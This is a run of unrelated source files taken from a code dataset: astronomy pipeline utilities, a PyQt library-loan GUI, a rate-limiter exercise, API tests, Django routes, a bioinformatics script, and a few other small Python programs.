ima_rot_resampled.wcs\n finalwcs.rotate(-rotangle)\n\n # create the final image\n data_cube_rot = np.repeat(ima_rot_resampled[np.newaxis,:,:].data,\n cubewcs.shape[0], axis=0)\n final_rot_cube = Cube(data=data_cube_rot, wave=cubewcs.wave, wcs=finalwcs)\n\n # Save image\n if isinstance(in_suffix, str) and in_suffix != \"\" and in_suffix in cube_name:\n out_name = cube_name.replace(in_suffix, out_suffix)\n else:\n name, extension = os.path.splitext(cube_name)\n if out_suffix != \"\":\n out_suffix = \"_{}\".format(out_suffix)\n out_name = \"{0}{1}{2}\".format(name, out_suffix, extension)\n\n # write output\n final_rot_cube.write(joinpath(outwcs_folder, out_name))\n return outwcs_folder, out_name\n\ndef filter_list_with_pdict(input_list, list_pointings=None,\n dict_files=None,\n verbose=True):\n \"\"\"Filter out exposures (pixtab or cube namelist) using a dictionary which\n has a list of pointings and for each pointing a list of exposure number.\n\n Args:\n input_list (list of str): input list to filter\n dict_files (dict): dictionary used to filter\n\n Returns:\n selected_list: selected list of files\n\n \"\"\"\n nfiles_input_list = len(input_list)\n if dict_files is None:\n selected_list = input_list\n\n # Otherwise use the ones which are given via their expo numbers\n else:\n selected_list = []\n # this is the list of exposures to consider\n\n if list_pointings is None:\n list_pointings = dict_files.keys()\n elif not isinstance(list_pointings, list):\n upipe.print_error(\"Cannot recognise input pointing(s)\")\n return selected_list\n\n for pointing in list_pointings:\n if pointing not in dict_files:\n upipe.print_warning(\"Pointing {} not in dictionary \"\n \"- skipping\".format(pointing))\n 
else:\n list_expo = dict_files[pointing]\n # We loop on that list\n for expotuple in list_expo:\n tpl, nexpo = expotuple[0], expotuple[1]\n for expo in nexpo:\n # Check whether this exists in the our cube list\n suffix_expo = \"_{0:04d}\".format(np.int(expo))\n for filename in input_list:\n if (suffix_expo in filename) and (tpl in filename):\n # We select the file\n selected_list.append(filename)\n # And remove it from the list\n input_list.remove(filename)\n # We break out of the cube for loop\n break\n\n if verbose:\n upipe.print_info(\"Pointings {0} - Selected {1}/{2} files after \"\n \"dictionary filtering\".format(list_pointings,\n len(selected_list),\n nfiles_input_list))\n return selected_list\n\ndef filter_list_with_suffix_list(list_names, included_suffix_list=[],\n excluded_suffix_list=[], name_list=\"\"):\n \"\"\"\n\n Args:\n list_names (list of str):\n included_suffix_list (list of str):\n excluded_suffix_list (list of str):\n\n Returns:\n\n \"\"\"\n if name_list is not None:\n add_message = f\"for list {name_list}\"\n else:\n add_message = \"\"\n\n # if the list of inclusion suffix is empty, just use all cubes\n if len(included_suffix_list) > 0:\n upipe.print_info(f\"Using suffixes {included_suffix_list} \"\n f\"as an inclusive condition {add_message}\")\n # Filtering out the ones that don't have any of the suffixes\n temp_list = copy.copy(list_names)\n for l in temp_list:\n if any([suff not in l for suff in included_suffix_list]):\n _ = list_names.remove(l)\n\n # if the list of exclusion suffix is empty, just use all cubes\n if len(excluded_suffix_list) > 0:\n upipe.print_info(f\"Using suffixes {excluded_suffix_list} \"\n f\"as an exclusive condition {add_message}\")\n # Filtering out the ones that have any of the suffixes\n temp_list = copy.copy(list_names)\n for l in temp_list:\n if any([suff in l for suff in excluded_suffix_list]):\n _ = list_names.remove(l)\n\n return list_names\n","sub_path":"src/pymusepipe/util_pipe.py","file_name":"util_pipe.py","file_ext":"py","file_size_in_byte":23301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"388764222","text":"from telaLivro import Ui_TelaLivro\nfrom telaUsuario import Ui_TelaUsuario\nfrom telaEmprestimo import Ui_TelaEmprestimo\nimport telaEmprestimo\nimport telaDevolucao\nimport emprestimo\nfrom emprestimo import Livro, Usuario, Emprestimo\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport sys\n\nb = emprestimo.Biblioteca()\n\nclass TelaUsuario(Ui_TelaUsuario):\n\tdef __init__(self, dialog):\n\t\tUi_TelaUsuario.__init__(self)\n\t\tself.setupUi(dialog)\n\n\t\tself.addUser.clicked.connect(self.printName)\n\n\tdef printName(self):\n\t\tuser = User()\n\t\tuser.nome = self.inputNome.text()\n\t\tb.insertUsuario(user)\n\nclass TelaLivro(Ui_TelaLivro):\n\tdef __init__(self, dialog):\n\t\tUi_TelaLivro.__init__(self)\n\t\tself.setupUi(dialog)\n\n\t\tself.addLivro.clicked.connect(self.printName)\n\n\tdef printName(self):\n\t\tlivro = Livro()\n\t\tlivro.nome = self.inputNome.text()\n\t\tb.insertLivro(livro)\n\nclass TelaEmprestimo(Ui_TelaEmprestimo):\n\tdef __init__(self, dialog):\n\t\tUi_TelaEmprestimo.__init__(self)\n\t\tself.setupUi(dialog)\n\n\t\tself.addLivro.clicked.connect(self.adicionaLivro)\n\t\tself.addUser.clicked.connect(self.adicionaUser)\n\t\tself.addEmprestimo.clicked.connect(self.adicionaEmprestimo)\n\t\tself.devolver.clicked.connect(self.devolveLivro)\n\n\tdef adicionaLivro(self):\n\t\tlivro = Livro()\n\t\tlivro.nome = 
self.novoLivro.text()\n\t\tb.insertLivro(livro)\n\t\tself.novoLivro.setText(\"\")\n\t\tself.comboLivro.clear()\n\t\tfor livro in b.livros:\n\t\t\tself.comboLivro.addItem(str(livro.nome))\n\t\n\tdef adicionaUser(self):\n\t\tuser = Usuario()\n\t\tuser.nome = self.novoUser.text()\n\t\tb.insertUsuario(user)\n\t\tself.novoUser.setText(\"\")\n\t\tself.comboUsuario.clear()\n\t\tfor user in b.usuarios:\n\t\t\tself.comboUsuario.addItem(str(user.nome))\n\n\tdef adicionaEmprestimo(self):\n\t\tlivro = b.localizarLivro(self.comboLivro.currentText())\n\t\tusuario = b.localizarUsuario(self.comboUsuario.currentText())\n\t\tb.emprestar(livro, usuario)\n\t\tself.comboLivro.removeItem(self.comboLivro.currentIndex())\n\t\tself.comboEmprestimo.clear()\n\t\tfor emp in b.emprestimos:\n\t\t\tself.comboEmprestimo.addItem(str(emp.livro.nome) + \" - \" + str(emp.usuario.nome))\n\n\n\tdef devolveLivro(self):\n\t\temp = self.comboEmprestimo.currentText().split(\" - \")\n\t\tlivro = b.localizarLivro(emp[0])\n\t\tusuario = b.localizarUsuario(emp[1])\n\t\temprestimo = b.localizarEmprestimo(livro, usuario)\n\t\tb.devolver(emprestimo)\n\t\tb.emprestimos.remove(emprestimo)\n\t\tself.comboEmprestimo.removeItem(self.comboEmprestimo.currentIndex())\n\t\tself.comboLivro.addItem(str(livro.nome))\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n dialog = QtWidgets.QDialog()\n\n prog = TelaEmprestimo(dialog)\n\n dialog.show()\n sys.exit(app.exec_())\n\ndef adicionarLivro():\n\tl = emprestimo.Livro(telaLivro.retornaLabelNome())\n\tb.insertLivro(l)\n\ndef adicionarUsuario():\n\tu = emprestimo.Usuario(telaUsuario.retornarNome())\n\tb.insertUsuario(u)\n\ndef fazerEmprestimo():\n\tl = b.localizarLivro(telaEmprestimo.retornaLabelNome())\n\tu = b.localizarUsuario(telaEmprestimo.retornarNome())\n\tb.emprestimo(l,u)\n\ndef fazerDevolucao():\n\tl = b.localizarLivro(telaDevolucao.retornaLabelNome())\n\tu = b.localizarUsuario(telaDevolucao.retornarNome())\n\te = b.localizarEmprestimo(l,u)\n\tb.devolver(e)","sub_path":"T4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"211052559","text":"\"\"\"\nDesign a logger system that receive stream of messages along with its timestamps, \neach message should be printed if and only if it is not printed in the last 10 seconds.\n\nGiven a message and a timestamp (in seconds granularity), return true if \nthe message should be printed in the given timestamp, otherwise returns false.\n\nIt is possible that several messages arrive roughly at the same time.\n\nExample:\nLogger logger = new Logger();\n\n// logging string \"foo\" at timestamp 1\nlogger.shouldPrintMessage(1, \"foo\"); returns true; \n\n// logging string \"bar\" at timestamp 2\nlogger.shouldPrintMessage(2,\"bar\"); returns true;\n\n// logging string \"foo\" at timestamp 3\nlogger.shouldPrintMessage(3,\"foo\"); returns false;\n\n// logging string \"bar\" at timestamp 8\nlogger.shouldPrintMessage(8,\"bar\"); returns false;\n\n// logging string \"foo\" at timestamp 10\nlogger.shouldPrintMessage(10,\"foo\"); returns false;\n\n// logging string \"foo\" at timestamp 11\nlogger.shouldPrintMessage(11,\"foo\"); returns true;\n\"\"\"\nclass Logger:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.buffer = dict()\n\n def shouldPrintMessage(self, timestamp: int, message: str) -> bool:\n \"\"\"\n Returns true if the message should be printed in the given timestamp, 
otherwise returns false.\n If this method returns false, the message will not be printed.\n The timestamp is in seconds granularity.\n \"\"\"\n ret = True\n if message not in self.buffer:\n self.buffer[message] = [timestamp]\n else:\n num = -1 \n while True:\n if self.buffer[message][num] > timestamp - 10:\n ret = False\n break\n elif self.buffer[message][num] <= timestamp - 10:\n #self.buffer[message] = self.buffer[message][num:]\n self.buffer[message].append(timestamp)\n break\n num -= 1\n if num < 0:\n break\n return ret","sub_path":"359.LoggerRateLimiter.py","file_name":"359.LoggerRateLimiter.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"2898493","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@Time :2018-07-16 下午 4:32\n@Author : 罗林\n@File : test_005_Finance_devices.py\n@desc : \n\"\"\"\n\nimport json\nimport time\n\nimport datetime\n\nfrom common.myCommon import Assertion as a\nfrom common.myCommon.TestBaseCase import TestBaseCase\nfrom finance.mysqlQuery import FinanceSql as fs\nfrom finance.mysqlQuery import ManageSql as ms\nfrom finance.testAction import FinanceAction as f\nfrom common.myCommon import TimeFormat as tf\nfrom finance.testSource import Api_Const as c\n\n\norgCode = ms.get_finance_db_id()\n\n\nclass test_005_Finance_devices(TestBaseCase):\n\n # 设备管理\n def test_001_getDeviceType(self):\n # 获取设备类型信息\n r1 = json.loads(f.test_device_getDeviceType())\n a.verity(r1['data'][0]['dictCode'], '1', '断言dictCode')\n a.verity(r1['data'][0]['dictName'], '有线', '断言dictName')\n a.verity(r1['data'][0]['id'], 20, '断言id')\n a.verity(r1['data'][1]['dictCode'], '0', '断言dictCode')\n a.verity(r1['data'][1]['dictName'], '无线', '断言dictName')\n a.verity(r1['data'][1]['id'], 21, '断言id')\n\n def test_002_getDeviceMoudel(self):\n # 获取设备型号信息\n r2 = json.loads(f.test_device_getDeviceMoudel('1'))\n a.verity(r2['data'][0]['dictLevel'], 1, '断言dictLevel')\n a.verity(r2['data'][0]['dictName'], 'GT02D', '断言dictName')\n a.verity(r2['data'][0]['id'], 81, '断言id')\n a.verity(r2['data'][1]['dictLevel'], 1, '断言dictLevel')\n a.verity(r2['data'][1]['dictName'], 'GM02F', '断言dictName')\n a.verity(r2['data'][1]['id'], 85, '断言id')\n a.verity(r2['data'][2]['dictLevel'], 1, '断言dictLevel')\n a.verity(r2['data'][2]['dictName'], 'GM02E', '断言dictName')\n a.verity(r2['data'][2]['id'], 86, '断言id')\n a.verity(r2['data'][3]['dictLevel'], 1, '断言dictLevel')\n a.verity(r2['data'][3]['dictName'], 'GT06N', '断言dictName')\n a.verity(r2['data'][3]['id'], 88, '断言id')\n\n def test_003_getLowerOrg(self):\n # 获取机构信息\n r3 = json.loads(f.test_device_getLowerOrg())\n a.verity(r3['data'][0]['orgCode'], orgCode, '断言orgCode')\n a.verity(r3['data'][0]['name'], c.companyName, '断言组织机构名称')\n\n def test_004_device_save(self):\n # 保存设备记录\n f.test_device_save('', orgCode, c.devicetypecode,\n c.devicemoudelCode, c.deviceCode, '001', tf.getnow_day())\n\n def test_005_device_update(self):\n device_id = fs.get_device_id(c.deviceCode)\n # 更新设备记录\n f.test_device_update(device_id, orgCode, c.devicetypecode,\n c.devicemoudelCode, c.deviceCode, '001', tf.getnow_day())\n\n def test_006_device_list(self):\n # 设备列表\n r4 = json.loads(f.test_device_list(devicecode='', pagesize=10, pagenum=10))\n a.verity(r4['data']['pageNum'], 1, '断言pageNum')\n a.verity(r4['data']['pageSize'], 10, '断言pageSize')\n # a.verityContain(r4['data']['record'], c.deviceCode, '断言修改后的deviceCode')\n\n def test_007_device_detail(self):\n # 获取设备详情\n device_id = 
fs.get_device_id(c.deviceCode)\n r5 = json.loads(f.test_device_detail(device_id))\n a.verity(r5['data']['deviceCode'], c.deviceCode, '断言deviceCode')\n a.verity(r5['data']['id'], device_id[0][0], '断言device_id')\n a.verity(r5['data']['moudelCode'], c.devicemoudelCode, '断言moudelCode')\n a.verity(r5['data']['orgCode'], orgCode, '断言orgCode')\n a.verity(r5['data']['typeCode'], c.devicetypecode, '断言typeCode')\n\n def test_008_device_delete(self):\n device_id = fs.get_device_id(c.deviceCode)\n # 删除设备记录\n f.test_device_delete(device_id)\n","sub_path":"api-test/finance/test2/test_005_Finance_devices.py","file_name":"test_005_Finance_devices.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"285767242","text":"from django.urls import path\n\nfrom crisis.views.af_crisis_participant_views import \\\n ListCreateAffectedParticipantRequestsAPIV1\nfrom crisis.views.common_views import CrisisListAPIV1, \\\n ListAffectedParticipantsAPIV1\nfrom crisis.views.hl_crisis_participant_views import AssignRequestAsHLAPIView\n\nurlpatterns = [\n path(\"\", CrisisListAPIV1.as_view(), name=\"list_crisies\"),\n path(\n \"/affected-participants/\",\n ListAffectedParticipantsAPIV1.as_view(),\n name=\"list_affected_participants\",\n ),\n path(\n \"/affected-participants//requests/\",\n ListCreateAffectedParticipantRequestsAPIV1.as_view(),\n name=\"list_create_requests\",\n ),\n path(\n \"/affected-participants//requests\"\n \"//assign/\",\n AssignRequestAsHLAPIView.as_view(),\n name=\"assign_request_as_hl\",\n ),\n]\n","sub_path":"crisis/urls_v1.py","file_name":"urls_v1.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"399253226","text":"#!/usr/bin/env python3\n\n# http://rosalind.info/problems/grph/\n\nimport itertools\nfrom fasta_reader import parse_fasta\n\ndef overlap_graph(*strings, order=3):\n prefixes={}\n suffixes={}\n for string_id,string in enumerate(strings):\n prefix=string[:order]\n suffix=string[-order:]\n if not prefix in prefixes:\n prefixes[prefix]=[]\n prefixes[prefix].append(string_id)\n if not suffix in suffixes:\n suffixes[suffix]=[]\n suffixes[suffix].append(string_id)\n for suffix in suffixes:\n if suffix in prefixes:\n for src,dest in itertools.product(suffixes[suffix], prefixes[suffix]):\n if src!=dest:\n yield src, dest\n\ndef main(filename):\n fasta=parse_fasta(filename)\n strings=[case[1] for case in fasta]\n for src,dest in overlap_graph(*strings, order=3):\n print(\"{0} {1}\".format(fasta[src][0][1:], fasta[dest][0][1:]))\n\nif __name__==\"__main__\":\n from sys import argv\n main(argv[-1])\n","sub_path":"Rosalind/overlap_graph.py","file_name":"overlap_graph.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"195283664","text":"import numpy as np\nfrom operator import itemgetter\nimport copy\nimport random\n\ncontext_features = [\"ownCard\",\"haveCard\",\"colleagueAvailable\",\"at_kitchen\",\"AnnInOffice\",\"havePod\",\"at_office\",\"haveCoffee\",\"at_shop\",\"haveMoney\"]\n\n\n#This is an example of a starting context\ncontext = {\ncontext_features[0] : True,\ncontext_features[1] : False,\ncontext_features[2] : True,\ncontext_features[3] : False,\ncontext_features[4] : True,\ncontext_features[5] : False,\ncontext_features[6] : True,\ncontext_features[7] : False,\ncontext_features[8] : 
False,\ncontext_features[9] : True\n}\n\nlocations = {\n\"kitchen\" : np.array([0,0]),\n\"office\" : np.array([1,0]),\n\"shop\" : np.array([0,10])\n}\ndef specific_action_value_features(c,l,place): #given a context and locations, produce\n action_value_features = {}\n actions = [\"getKitchenCoffee\",\"getOfficeCoffee\",\"getShopCoffee\"]\n if place==\"at_kitchen\": #We're in the kitchen\n action_value_features = {\n \"getKitchenCoffee\" : [\"bad\",\"none\",0],\n \"getOfficeCoffee\" : [\"good\",\"none\",np.linalg.norm(locations[\"office\"]-locations[\"kitchen\"])],\n \"getShopCoffee\" : [\"veryGood\",\"high\",np.linalg.norm(locations[\"shop\"]-locations[\"kitchen\"])],\n }\n elif place==\"at_office\": #We're in the office\n action_value_features = {\n \"getKitchenCoffee\" : [\"bad\",\"none\",np.linalg.norm(locations[\"kitchen\"]-locations[\"office\"])],\n \"getOfficeCoffee\" : [\"good\",\"none\",0],\n \"getShopCoffee\" : [\"veryGood\",\"high\",np.linalg.norm(locations[\"shop\"]-locations[\"office\"])],\n }\n pass\n elif place==\"at_shop\": #We're in the shop\n action_value_features = {\n \"getKitchenCoffee\" : [\"bad\",\"none\",np.linalg.norm(locations[\"kitchen\"]-locations[\"shop\"])],\n \"getOfficeCoffee\" : [\"good\",\"none\",np.linalg.norm(locations[\"office\"]-locations[\"shop\"])],\n \"getShopCoffee\" : [\"veryGood\",\"high\",0],\n }\n else:\n return \"SOMETHING IS MESSED UP!\"\n return action_value_features\n\ndef generate_action_value_features(c,l): #given a context and locations, produce\n action_value_features = {}\n actions = [\"getKitchenCoffee\",\"getOfficeCoffee\",\"getShopCoffee\"]\n if c[\"at_kitchen\"]: #We're in the kitchen\n action_value_features = {\n \"getKitchenCoffee\" : [\"bad\",\"none\",0],\n \"getOfficeCoffee\" : [\"good\",\"none\",np.linalg.norm(locations[\"office\"]-locations[\"kitchen\"])],\n \"getShopCoffee\" : [\"veryGood\",\"high\",np.linalg.norm(locations[\"shop\"]-locations[\"kitchen\"])],\n }\n elif c[\"at_office\"]: #We're in the office\n action_value_features = {\n \"getKitchenCoffee\" : [\"bad\",\"none\",np.linalg.norm(locations[\"kitchen\"]-locations[\"office\"])],\n \"getOfficeCoffee\" : [\"good\",\"none\",0],\n \"getShopCoffee\" : [\"veryGood\",\"high\",np.linalg.norm(locations[\"shop\"]-locations[\"office\"])],\n }\n pass\n elif c[\"at_shop\"]: #We're in the shop\n action_value_features = {\n \"getKitchenCoffee\" : [\"bad\",\"none\",np.linalg.norm(locations[\"kitchen\"]-locations[\"shop\"])],\n \"getOfficeCoffee\" : [\"good\",\"none\",np.linalg.norm(locations[\"office\"]-locations[\"shop\"])],\n \"getShopCoffee\" : [\"veryGood\",\"high\",0],\n }\n else:\n return \"SOMETHING IS MESSED UP!\"\n return action_value_features\n\n#print(context)\n#print(generate_action_value_features(context,locations)) \n\n\ndef print_rollout(pv,c,l):\n actions = [\"getKitchenCoffee\",\"getOfficeCoffee\",\"getShopCoffee\"]\n real_avf = generate_action_value_features(c,l)\n\n\n best_pv_action = \"\"\n counter = 0\n print(\"PRINTING PV\")\n print(pv)\n for pv_el in pv: #for each value tuple\n print(pv_el)\n if real_avf[\"getKitchenCoffee\"] == pv_el:\n best_pv_action = \"getKitchenCoffee\"\n print(counter)\n break\n elif real_avf[\"getOfficeCoffee\"] == pv_el:\n best_pv_action = \"getOfficeCoffee\"\n print(counter)\n break\n elif real_avf[\"getShopCoffee\"] == pv_el:\n best_pv_action = \"getShopCoffee\"\n print(counter)\n break\n counter += 1\n print(best_pv_action)\n \n\n av = generate_action_value_features(c,l)\n if c[\"at_kitchen\"]:\n print(\"Currently in the 
kitchen\")\n cur_place = \"kitchen\"\n if c[\"at_office\"]:\n print(\"Currently in the office\")\n cur_place = \"office\"\n if c[\"at_shop\"]:\n print(\"Currently in the shop\")\n cur_place = \"shop\"\n\n if best_pv_action in actions:\n if best_pv_action == actions[0]:\n if c[\"ownCard\"]:\n print(\"Get a staff card I own to access the coffee.\")\n elif c[\"colleagueAvailable\"]:\n print(\"Get colleague to given me a coffee card to access coffe\") \n else :\n return\n \n print(\"Go to the Kitchen that is this far away from the \"+str(cur_place+str(av[\"getKitchenCoffee\"][2])))\n\n print(\"Get the coffee in the kitchen with the accessed card\")\n return\n \n elif best_pv_action == actions[1]:\n if c[\"AnnInOffice\"]:\n print(\"Go to the Office that is this far away from the current spot:\"+str(cur_place)+\" \" +str(av[\"getOfficeCoffee\"][2]))\n print(\"Get a Pod in office\")\n print(\"Get coffe in the office\")\n else:\n return\n return\n elif best_pv_action == actions[2]:\n print(\"Go to the Shop that is this far away from the current spot:\"+str(cur_place)+\" \"+str(av[\"getShopCoffee\"][2]))\n print(\"Get Cofffe at the shop\")\n print(\"Pay shop the money\")\n return\n \n\n\ndef learn_social_norms(c,l): #Learn the best ordering of values for a given context and a specific set of actions.\n #get randomly initialized ordering of actions\n real_action_values = generate_action_value_features(c,l)\n\n set_of_context_features = []\n set_of_context_features.append(specific_action_value_features(c,l,\"at_kitchen\").values())\n set_of_context_features.append(specific_action_value_features(c,l,\"at_office\").values())\n set_of_context_features.append(specific_action_value_features(c,l,\"at_shop\").values())\n flat_cf = [item for sublist in set_of_context_features for item in sublist]\n print(flat_cf)\n #print(set_of_context_features)\n\n for f in flat_cf:\n print(f)\n\n training_loops = 5\n num_pv = 10\n num_top = 5\n num_new = num_pv-num_top\n\n\n pvo = [] #potential value orderings\n for i in range(num_pv):\n random.shuffle(flat_cf)\n x = copy.copy(flat_cf)\n pvo.append(x)\n\n for i in range(training_loops):\n community_feedback = []\n print(\"training loop: \"+str(i))\n counter = 0\n for pv in pvo:\n print(\"CONTEXT 1: IN OFFICE\")\n c[\"at_shop\"] = False\n c[\"at_office\"] = True\n print_rollout(pv,c,l)\n\n print(\"CONTEXT 2: IN KITCHEN\")\n c[\"at_office\"] = False\n c[\"at_kitchen\"] = True\n print_rollout(pv,c,l)\n\n print(\"CONTEXT 3: IN SHOP\")\n c[\"at_kitchen\"] = False\n c[\"at_shop\"] = True\n print_rollout(pv,c,l)\n feedback = raw_input(\"How much did you like this behavior?\")\n community_feedback.append((float(feedback),counter))\n counter += 1\n\n print(community_feedback)\n\n #change the pvo list to be better based on community feedback\n sorted_cf = sorted(community_feedback, key=itemgetter(0))\n sorted_cf.reverse()\n print(sorted_cf)\n\n new_pvo = []\n for top in range(num_top):\n new_pvo.append(pvo[sorted_cf[top][1]]) \n\n for i in range(num_new):\n random.shuffle(flat_cf)\n x = copy.copy(flat_cf)\n new_pvo.append(x)\n pvo=new_pvo\n \n \n\n #print(c)\n #print(l)\n\nlearn_social_norms(context,locations)\n\n","sub_path":"social_norm.py","file_name":"social_norm.py","file_ext":"py","file_size_in_byte":8025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"241668328","text":"# Copyright (c) James Percent, Byron Galbraith and Unlock contributors.\n# All rights reserved.\n# Redistribution and use in source and binary forms, 
with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# \n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of Unlock nor the names of its contributors may be used\n# to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport socket\nimport numpy as np\nimport random\n\n__author__ = 'jpercent'\n\nclass RMSSignalGenerator(object):\n '''\n Generates simulated device samples. Each invocation of the\n generate method returns a table of samples. The generate method determines sample values\n by consulting an unlock.state.SequenceState. The state returns a tuple of True/False values,\n one for each channel. A state channel value that is True results in a sample value, for the\n corresponding channel, that is above the threshold; a False value results in a value above\n the min, but below the threshold.\n \n channels: number of channels\n minmax: list of tuples denoting the min and max values of a channel\n thresholds: list of channel thresholds\n state: an unlock.state.SequenceState. 
provides a means to dynamically configure\n which channels of a given set of samples are above/below threshold values\n samples: default number of samples per request\n ''' \n def __init__(self, channels, minmax, thresholds, state, samples, seed=31337):\n assert channels == len(thresholds) and channels == len(minmax)\n self.channels = channels\n self.min = 0\n self.max = 1\n self.minmax = minmax\n self.thresholds = thresholds\n self.samples = samples\n self.state = state\n self.state.start()\n self.generate_sample = self.simple_sample_gen\n self.random = random.Random()\n self.random.seed(seed)\n \n def generate_samples(self, samples=None):\n if samples == None:\n samples = self.samples\n \n ret = np.zeros((samples, self.channels))\n for sample in range(samples):\n ret[sample] = self.generate_sample(self.state.state())\n self.state.step()\n return ret\n \n def simple_sample_gen(self, state_value):\n assert self.channels == len(state_value)\n sample = np.zeros(self.channels)\n for i in range(self.channels):\n if state_value[i] == True:\n sample[i] = self.random.randint(self.thresholds[i], self.minmax[i][self.max])\n elif state_value[i] == False:\n sample[i] = self.random.randint(self.minmax[i][self.min], self.thresholds[i]-1)\n else:\n raise Exception('invalid state')\n return sample\n \nif __name__ == '__main__':\n # example \n from unlock.state import SequenceState\n channels = 4\n minmax = [(0,10), (-10, 10), (9,100), (0,7)]\n thresholds = [ 8, 5, 80, 5]\n samples = 12\n seq = [(False, False, False, False), (True, False, False, False), (True, True, False, False),\n (False, False, False, True), (False, True, False, False), (True, False, True, False),\n (False, False, True, False), (False, False, False, True),\n (True, False, False, True), (False, True, False, True), (True, True, True, False),\n (True, True, True, True)]\n state = SequenceState(seq)\n print(state.sequence)\n gen = RMSSignalGenerator(channels, minmax, thresholds, state, samples)\n sample_values = gen.generate_samples()\n for i in range(len(seq)):\n print (\"Sequence value = \", seq[i])\n print(\"Normalized Sample = \", sample_values[i] - np.array(thresholds))\n print('-'*80)\n ","sub_path":"unlock/util/signal.py","file_name":"signal.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"602239646","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"This module defines :class:`SetupMaker` class\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport os\nimport sys\nfrom functools import partial\n\nfrom . 
import settings\nfrom .base import BaseMaker\nfrom ..utils.helpers import read_setup_cfg\n\n\nclass SetupMaker(BaseMaker):\n \"\"\"SetupMaker creates *setup.py* file inside the project directory.\n\n Args:\n projectDir (str): absolute path of project directory to create\n force (bool): option for overwriting if the file exists.\n\n \"\"\"\n def __init__(self, projectDir, force, **kwargs):\n self.projectDir = projectDir\n self.force = force\n\n self._update_settings()\n\n def _update_settings(self):\n settings.registry.update(read_setup_cfg(os.path.join(self.projectDir, 'setup.cfg')))\n\n _format_multi_line_list = self._format\n _format_single_line_list = partial(self._format, indent=0, sep=', ')\n _format_multi_line_dict = partial(self._format, quote=False)\n\n info = {\n 'exclude':\n _format_single_line_list(settings.registry.get('exclude')),\n 'python_requires':\n self._get_python_requires(settings.registry.get('classifiers')),\n 'classifiers':\n _format_multi_line_list(settings.registry.get('classifiers')),\n 'install_requires':\n _format_multi_line_list(settings.registry.get('install_requires')),\n 'setup_requires':\n _format_multi_line_list(settings.registry.get('setup_requires')),\n 'tests_require':\n _format_multi_line_list(settings.registry.get('tests_require')),\n 'extras_require':\n _format_multi_line_dict(settings.registry.get('extras_require')),\n }\n\n settings.registry.update(info)\n\n @staticmethod\n def _format(text, quote=True, indent=8, sep=',\\n'):\n \"\"\" convert data read from setup.cfg to the suitable format for setup.py\n\n \"\"\"\n if not text:\n return ''\n\n split_sep = '\\n' if text.find('\\n') != -1 else '; '\n\n if quote:\n opt_list = list(map(repr, text.split(split_sep)))\n else:\n opt_list = text.split(split_sep)\n\n INDENT = ' ' * indent\n separator = sep + INDENT\n return separator.join(opt_list)\n\n @staticmethod\n def _get_python_requires(classifiers):\n \"\"\"Infer the version of required python version from the given classifiers list\n\n Args:\n classifiers (str): the value of 'classifiers' in settings.registry\n\n Returns:\n\n \"\"\"\n count = 0\n min_ver = 'HIGH_VERSION'\n classifiers_list = classifiers.split('\\n')\n for c in classifiers_list:\n if c.startswith('Programming Language :: Python'):\n count += 1\n ver = c.split('::')[-1].strip()\n if ver < min_ver:\n min_ver = ver\n\n # if we can not determine the required_python_version, apply the current\n if min_ver == 'HIGH_VERSION':\n min_ver = sys.version.split()[0]\n\n sign = '>=' if count >= 2 else '=='\n\n return sign + min_ver\n\n def generate(self):\n return self.write_file('setup',\n os.path.join(self.projectDir, 'setup.py'))\n","sub_path":"templator/makers/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"545605573","text":"import schnetpack as spk\nimport readline\nimport os\nfrom sys import argv\nimport numpy as np\nfrom ase import Atoms\nfrom ase.units import Bohr\nfrom schnetpack.data import AtomsData\ndef 